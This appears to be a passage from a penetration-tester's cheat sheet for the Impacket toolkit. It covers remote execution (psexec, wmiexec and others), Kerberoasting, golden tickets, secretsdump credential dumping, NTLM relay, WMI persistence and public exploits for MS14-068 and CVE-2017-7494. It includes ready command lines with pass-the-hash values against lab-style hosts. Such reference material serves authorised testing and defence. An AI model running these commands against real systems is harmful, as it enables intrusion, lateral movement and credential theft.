The rpc_access_denied error should mean that a non-administrator account was used (or a local administrator account was used, but the Network UAC is enabled).  
  
## Remote Execution  
psexec.py: Required 445  
PSEXEC like functionality example using RemComSvc(https://github.com/kavika13/RemCom). RemCom is a small (10KB upx packed) remoteshell / telnet replacement that lets you execute processes on remote windows systems, copy files on remote systems, process there output and stream it back.   
It allows execution of remote shell commands directly with full interactive console without having to install any client software. On local machines it is also able to impersonate so can be used as a silent replacement for Runas command.  
[*] Requesting shares on DMZDC01.complyedge.com.....  
[*] Found writable share ADMIN$  
[*] Uploading file YJhRKEpW.exe  
[*] Opening SVCManager on DMZDC01.complyedge.com.....  
[*] Creating service SyQN on DMZDC01.complyedge.com.....  
[*] Starting service SyQN.....  
 lcd {path}                 - changes the current local directory to {path}  
 exit                       - terminates the server process (and this session)  
 put {src_file, dst_path}   - uploads a local file to the dst_path RELATIVE to the connected share (ADMIN$)  
 get {file}                 - downloads pathname RELATIVE to the connected share (ADMIN$) to the current local dir  
 ! {cmd}                    - executes a local shell cmd  
psexec.py domain:username@10.11.1.218 cmd.exe -path c:\\windows\\system32  
psexec.py corp.local/wsadmin@172.16.1.36 -hashes aad3b435b51404eeaad3b435b51404ee:669b12a3bac275251170afbe2c5de8c2  
psexec.py -k -no-pass COMPLYEDGE.COM/pete@DMZDC01.complyedge.com  
  
wmiexec.py: Required 135,445,a high port **Highly stealthy**  
A semi-interactive shell, used through Windows Management Instrumentation. It does not require to install any service/agent at the target server. Runs as Administrator.   
 lcd {path}                 - changes the current local directory to {path}  
 exit                       - terminates the server process (and this session)  
 put {src_file, dst_path}   - uploads a local file to the dst_path (dst_path = default current directory)  
 get {file}                 - downloads pathname to the current local dir   
 ! {cmd}                    - executes a local shell cmd  
./wmiexec.py domain/username@10.10.10.149 netstat  
wmiexec.py COMPLYEDGE.COM/pete@DMZDC01.complyedge.com -k -no-pass  
  
smbexec.py: Required 445  
A similar approach to PSEXEC w/o using RemComSvc. The technique is described here. Our implementation goes one step further, instantiating a local smbserver to receive the output of the commands. This is useful in the situation where the target machine does NOT have a writeable share available.  
./smbexec.py domain/username@192.168.1.103  
smbexec.py -k -no-pass COMPLYEDGE.COM/pete@DMZDC01.complyedge.com  
  
atexec.py: Required 445  
This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.  
./atexec.py domain/username@10.10.10.149 systeminfo  
atexec.py -k -no-pass COMPLYEDGE.COM/pete@DMZDC01.complyedge.com whoami  
  
dcomexec.py: Required 135,445  
A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects.  
./dcomexec.py domain/usernam@192.168.1.103 dir  
  
## Kerberos  
GetUserSPNs.py -no-pass -k -dc-ip 172.16.126.165 -target-domain comply.com COMPLYEDGE.COM/pete  
GetADUsers.py -all -no-pass -k -dc-ip 172.16.126.168 COMPLYEDGE.COM/pete  
  
GetTGT.py: Given a password, hash or aesKey, this script will request a TGT and save it as ccache.  
GetST.py: Given a password, hash, aesKey or TGT in ccache, this script will request a Service Ticket and save it as ccache. If the account has constrained delegation (with protocol transition) privileges you will be able to use the -impersonate switch to request the ticket on behalf another user.  
GetPac.py: This script will get the PAC (Privilege Attribute Certificate) structure of the specified target user just having a normal authenticated user credentials. It does so by using a mix of [MS-SFU]s S4USelf + User to User Kerberos Authentication.  
GetUserSPNs.py: This example will try to find and fetch Service Principal Names that are associated with normal user accounts. Output is compatible with JtR and HashCat.  
GetNPUsers.py: This example will attempt to list and get TGTs for those users that have the property 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR.  
ticketConverter.py: This script will convert kirbi files, commonly used by mimikatz, into ccache files used by Impacket, and vice versa.  
ticketer.py: This script will create Golden/Silver tickets from scratch or based on a template (legally requested from the KDC) allowing you to customize some of the parameters set inside the PAC_LOGON_INFO structure, in particular the groups, ExtraSids, duration, etc.  
raiseChild.py: This script implements a child-domain to forest privilege escalation by (ab)using the concept of Golden Tickets and ExtraSids.  
  
## Windows Secrets  
secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there. For SAM and LSA Secrets (including cached creds) we try to read as much as we can from the registry and then we save the hives in the target system (%SYSTEMROOT%\Temp directory) and read the rest of the data from there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach. The script initiates the services required for its working if they are not available (e.g. Remote Registry, even if it is disabled). After the work is done, things are restored to the original state.  
secretsdump.py -pwd-last-set -user-status -history -ntds ./ntds.dit -security SECURITY -system SYSTEM local  
mimikatz.py: Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi.  
  
## Server Tools/MiTM Attacks  
ntlmrelayx.py: This script performs NTLM Relay Attacks, setting an SMB and HTTP Server and relaying credentials to many different protocols (SMB, HTTP, MSSQL, LDAP, IMAP, POP3, etc.). The script can be used with predefined attacks that can be triggered when a connection is relayed (e.g. create a user through LDAP) or can be executed in SOCKS mode. In this mode, for every connection relayed, it will be available to be used later on multiple times through a SOCKS proxy.  
karmaSMB.py: A SMB Server that answers specific file contents regardless of the SMB share and pathname specified.  
smbserver.py: A Python implementation of an SMB server. Allows to quickly set up shares and user accounts.  
  
## WMI  
wmiquery.py: It allows to issue WQL queries and get description of WMI objects at the target system (e.g. select name from win32_account).  
wmipersist.py: This script creates/removes a WMI Event Consumer/Filter and link between both to execute Visual Basic based on the WQL filter or timer specified.  
  
## Known Vulnerabilities  
goldenPac.py: Exploit for MS14-068. Saves the golden ticket and also launches a PSEXEC session at the target.  
sambaPipe.py: This script will exploit CVE-2017-7494, uploading and executing the shared library specified by the user through the -so parameter.  
smbrelayx.py: Exploit for CVE-2015-0005 using a SMB Relay Attack. If the target system is enforcing signing and a machine account was provided, the module will try to gather the SMB session key through NETLOGON.  
  
## SMB/MSRPC  
smbclient.py: A generic SMB client that will let you list shares and files, rename, upload and download files and create and delete directories, all using either username and password or username and hashes combination. It is an excellent example to see how to use impacket.smb in action.  
  
smbclient.py tricky/imaginarybit@172.16.126.155  
## shares                                                    
## use C$  
## ls *  
## cd Users  
## lcd /tmp  
## get proof.txt  
## put proof.txt  
   
 open {host,port=445} - opens a SMB connection against the target host/port  
 login {domain/username,passwd} - logs into the current SMB connection, no parameters for NULL connection. If no password specified, it will be prompted  
 kerberos_login {domain/username,passwd} - logs into the current SMB connection using Kerberos. If no password specified, it will be prompted. Use the DNS resolvable domain name  
 login_hash {domain/username,lmhash:nthash} - logs into the current SMB connection using the password hashes  
 logoff - logs off  
 shares - list available shares  
 use {sharename} - connect to an specific share  
 cd {path} - changes the current directory to {path}  
 lcd {path} - changes the current local directory to {path}  
 pwd - shows current remote directory  
 password - changes the user password, the new password will be prompted for input  
 ls {wildcard} - lists all the files in the current directory  
 rm {file} - removes the selected file  
 mkdir {dirname} - creates the directory under the current path  
 rmdir {dirname} - removes the directory under the current path  
 put {filename} - uploads the filename into the current path  
 get {filename} - downloads the filename from the current path  
 mount {target,path} - creates a mount point from {path} to {target} (admin required)  
 umount {path} - removes the mount point at {path} without deleting the directory (admin required)  
 info - returns NetrServerInfo main results  
 who - returns the sessions currently connected at the target host (admin required)  
 close - closes the current SMB Session  
 exit - terminates the server process (and this session)  
  
addcomputer.py: Allows to add a computer to a domain using LDAP or SAMR (SMB).  
  
getArch.py: This script will connect against a target (or list of targets) machine/s and gather the OS architecture type installed by (ab)using a documented MSRPC feature.  
./getArch.py -target 192.168.1.103  
  
exchanger.py: A tool for connecting to MS Exchange via RPC over HTTP v2.  
  
lookupsid.py: A Windows SID brute forcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.  
./lookupsid.py domain/username@10.10.10.149  
  
netview.py: Gets a list of the sessions opened at the remote hosts and keep track of them looping over the hosts found and keeping track of who logged in/out from remote servers  
./netview.py domain/username -target 192.168.1.103  
  
reg.py: Remote registry manipulation tool through the [MS-RRP] MSRPC Interface. The idea is to provide similar functionality as the REG.EXE Windows utility.  
./reg.py domain/username@192.168.1.103 query -keyName HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows -s  
./reg.py domain/username@192.168.1.103 -hashes aad3b435b51404eeaad3b435b51404ee:669b12a3bac275251170afbe2c5de8c2 query -keyname HKU\\  
./reg.py domain/username@192.168.1.103 -hashes aad3b435b51404eeaad3b435b51404ee:669b12a3bac275251170afbe2c5de8c2 query -keyname HKU\\Software\\  
  
rpcdump.py: This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well known endpoints.  
./rpcdump.py domain/username@192.168.1.103  
  
./rpcmap.py: Scan for listening DCE/RPC interfaces. This binds to the MGMT interface and gets a list of interface UUIDs. If the MGMT interface is not available, it takes a list of interface UUIDs seen in the wild and tries to bind to each interface.  
./rpcmap.py 'ncacn_ip_tcp:10.10.10.213' -brute-uuids -brute-opnums -auth-level 1 -opnum-max 5  
  
ifmap.py: This script will bind to the target`s MGMT interface to get a list of interface IDs. It will used that list on top of another list of interface UUIDs seen in the wild trying to bind to each interface and reports whether the interface is listed and/or listening.  
./ifmap.py 192.168.1.103 135  
  
samrdump.py: An application that communicates with the Security Account Manager Remote interface from the MSRPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service.  
./samrdump.py domain/username@10.10.10.149  
  
services.py: This script can be used to manipulate Windows services through the [MS-SCMR] MSRPC Interface. It supports start, stop, delete, status, config, list, create and change.  
./services.py domain/username@10.10.10.149 list  
  
## MSSQL / TDS  
mssqlinstance.py: Retrieves the MSSQL instances names from the target host.  
  
mssqlclient.py: An MSSQL client, supporting SQL and Windows Authentications (hashes too). It also supports TLS.  
  
## File Formats  
esentutl.py: An Extensibe Storage Engine format implementation. Allows dumping catalog, pages and tables of ESE databases (e.g. NTDS.dit)  
ntfs-read.py: NTFS format implementation. This script provides a mini shell for browsing and extracting an NTFS volume, including hidden/locked contents.  
registry-read.py: A Windwows Registry file format implementation. It allows to parse offline registry hives.  
  
## Other  
findDelegation.py: Simple script to quickly list all delegation relationships (unconstrained, constrained, resource-based constrained) in an AD environment.  
GetADUsers.py: This script will gather data about the domain`s users and their corresponding email addresses. It will also include some extra information about last logon and last password set attributes.  
mqtt_check.py: Simple MQTT example aimed at playing with different login options. Can be converted into a account/password brute forcer quite easily.  
rdp_check.py: [MS-RDPBCGR] and [MS-CREDSSP] partial implementation just to reach CredSSP auth. This example test whether an account is valid on the target host.  
sniff.py: Simple packet sniffer that uses the pcapy library to listen for packets in # transit over the specified interface.  
sniffer.py: Simple packet sniffer that uses a raw socket to listen for packets in transit corresponding to the specified protocols.  
ping.py: Simple ICMP ping that uses the ICMP echo and echo-reply packets to check the status of a host. If the remote host is up, it should reply to the echo probe with an echo-reply packet.  
ping6.py: Simple IPv6 ICMP ping that uses the ICMP echo and echo-reply packets to check the status of a host.